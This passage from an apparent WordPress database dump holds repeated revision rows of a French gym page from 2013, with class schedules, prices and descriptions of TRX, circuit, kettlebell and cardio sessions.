1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:33:46', '2013-07-03 16:33:46', '', 11, 'http://www.crosstrainingcenter.be/?p=170', 0, 'revision', '', 0),
(169, 1, '2013-07-03 16:33:05', '2013-07-03 16:33:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:33:05', '2013-07-03 16:33:05', '', 11, 'http://www.crosstrainingcenter.be/?p=169', 0, 'revision', '', 0),
(165, 1, '2013-07-03 16:28:22', '2013-07-03 16:28:22', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td class=\"ttitre\">Mardi</td>\r\n<td class=\"ttitre\">Mercredi</td>\r\n<td class=\"ttitre\">Jeudi</td>\r\n<td class=\"ttitre\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:28:22', '2013-07-03 16:28:22', '', 11, 'http://www.crosstrainingcenter.be/?p=165', 0, 'revision', '', 0),
(163, 1, '2013-07-03 16:26:59', '2013-07-03 16:26:59', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: 